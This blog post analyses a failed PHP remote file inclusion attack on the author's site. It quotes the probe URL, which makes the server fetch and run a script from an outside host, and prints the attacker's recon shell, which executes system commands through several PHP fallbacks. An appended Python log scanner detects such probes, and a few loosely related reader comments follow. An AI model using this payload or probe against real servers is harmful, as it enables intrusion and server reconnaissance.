FightSkillz.com - Life, Code, & Idiocy

Hack Attempts By Idiots

Looks like a bunch of Australian kids from Milton, Queensland, using a Korean school site to store their hacking scripts, attempted to break into my server the other day. They failed, but a record of their attempts was just sent to me, and curiosity gets the better of me sometimes. Read http://en.wikipedia.org/wiki/Remote_File_Inclusion for more info.

A bunch of log entries show them attempting to visit variations on this URL:

http://fightskillz.com/category////?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?

It appears they attempted to run their own script, hosted on the Korean server, from inside the PHP application my blog runs on: the query string tries to overwrite $_SERVER['DOCUMENT_ROOT'] (which only works when PHP's register_globals is on) so that an include() built from that variable fetches their file over HTTP instead of a local one. It seems like a pretty juvenile attempt at hacking, a textbook copied attempt at PHP injection. For interest's sake, the id1.txt file they were trying to run off my server contains the following:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

I had a look at id2.txt as well, just assuming there would be an id2 if there was an id1. It is much more comprehensive and grabs all kinds of system variables and information. Check it out below:

<?php
##[ Fx29ID ]##
fx("ID","FeeL"."CoMz");
$P   = @getcwd();
$IP  = @getenv("SERVER_ADDR");
$UID = fx29exec("id");
fx("SAFE",@safemode()?"ON":"OFF");
fx("OS",@PHP_OS);
fx("UNAME",@php_uname());
fx("SERVER",($IP)?$IP:"-");
fx("USER",@get_current_user());
fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());
fx("DIR",$P);
fx("PERM",(@is_writable($P))?"[W]":"[R]");
fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
fx("DISFUNC",@getdisfunc());
##[ FX29SHEXEC ]##
function fx($t,$c) { echo "$t: "; echo (is_array($c))?join(" ",$c):$c; echo "<br>"; }
function safemode() { return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE; }
function getdisfunc() { $rez = explode(",",@ini_get("disable_functions")); return (!empty($rez))?$rez:array(); }
function enabled($func) { return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; }
function fx29exec($cmd) {
  if (enabled("exec")) { exec($cmd,$o); $rez = join("\r\n",$o); }
  elseif (enabled("shell_exec")) { $rez = shell_exec($cmd); }
  elseif (enabled("system")) { @ob_start(); @system($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
  elseif (enabled("passthru")) { @ob_start(); passthru($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
  elseif (enabled("popen") && is_resource($h = popen($cmd.' 2>&1', 'r')) ) { while ( !feof($h) ) { $rez .= fread($h, 2096);  } pclose($h); }
  else { $rez = "Error!"; }
  return $rez;
}
function vsize($size) {
  if (!is_numeric($size)) { return FALSE; }
  else {
    if ( $size >= 1073741824 ) { $size = round($size/1073741824*100)/100 ." GB"; }
    elseif ( $size >= 1048576 ) { $size = round($size/1048576*100)/100 ." MB"; }
    elseif ( $size >= 1024 ) { $size = round($size/1024*100)/100 ." KB"; }
    else { $size = $size . " B"; }
    return $size;
  }
}
function hdd($type) {
  $P = @getcwd(); $T = @disk_total_space($P); $F = @disk_free_space($P); $U = $T - $U;
  $hddspace = array("total" => vsize($T), "free"  => vsize($F), "used"  => vsize($U));
  return $hddspace[$type];
}
die("FeeLCoMz");
?>

I guess they're aptly named id[1|2].txt, for identifying the system, and are used in that order: the harmless id1.txt tests whether the vulnerability exists without alerting anyone to the depth of access id2.txt would reveal on a vulnerable server. I did a few Google searches and came up with a bunch of different IP addresses and a bunch of different servers hosting the exact same files. I guess somewhere out there, in Milton, Queensland, Australia, there's a young idiot trying to be a hacker...
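As an added example (not from the original post), here is a small Python script that scans web-server access-log lines for the two signatures of the attempt above: a query parameter that names a PHP superglobal such as _SERVER[...] and a parameter value that is itself a URL. The log lines and client IP addresses are constructed to mirror the probe URL quoted in the post.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Apache "combined" access-log line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Parameter names that overwrite a PHP superglobal when register_globals is on.
SUPERGLOBAL_RE = re.compile(r'^(_SERVER|_GET|_POST|_COOKIE|_REQUEST|_ENV|_FILES|GLOBALS)\[', re.I)
# Parameter values an include() could fetch as remote code.
REMOTE_RE = re.compile(r'^(https?|ftps?)://', re.I)

def rfi_indicators(target):
    """Return (parameter, reason) pairs found in one request target (path + query)."""
    findings = []
    query = urlparse(target).query
    # parse_qsl percent-decodes names and values, so %5B...%5D and %3A%2F%2F are caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SUPERGLOBAL_RE.match(name):
            findings.append((name, "superglobal override"))
        if REMOTE_RE.match(value):
            findings.append((name, "remote URL in parameter"))
    return findings

def scan_log(lines):
    """Return one record per log line that carries RFI indicators."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = rfi_indicators(m["target"])
        if indicators:
            hits.append({"ip": m["ip"], "status": int(m["status"]),
                         "target": m["target"], "indicators": indicators})
    return hits

# Constructed sample log: the probe URL from the post (plain and percent-encoded) plus a benign hit.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2010:03:14:07 +1000] "GET /category////?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 512 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [10/Jun/2010:03:15:11 +1000] "GET /category/code/?paged=2 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jun/2010:03:15:40 +1000] "GET /index.php?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fwww.solmae.co.kr%2F%2F%2Freceipt%2Flib%2F_private%2Fid2.txt%3F HTTP/1.1" 404 512 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["indicators"])
```

Both probe lines are flagged on both counts while the ordinary paged request is ignored; grouping hits by client IP is the natural next step for a blocklist.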

3 Responses to “Hack Attempts By Idiots”

  1. Yoav Says:

    Wow, that's sick. Thanks for the link :D

  2. Yoav Says:

    My French is pretty fluent thanks to Google Translate… I'm glad they didn't actually get in but can't believe I was so apathetic about server security.

  3. Yoav Says:

    Hi Amanda, I'm planning on doing a more comprehensive post on it, but you should definitely install DenyHosts http://denyhosts.sourceforge.net

    Make sure you add your IP to the allow list after installing it, and leave an SSH session connected for a while so that if your IP does get blocked you still have access and can troubleshoot.
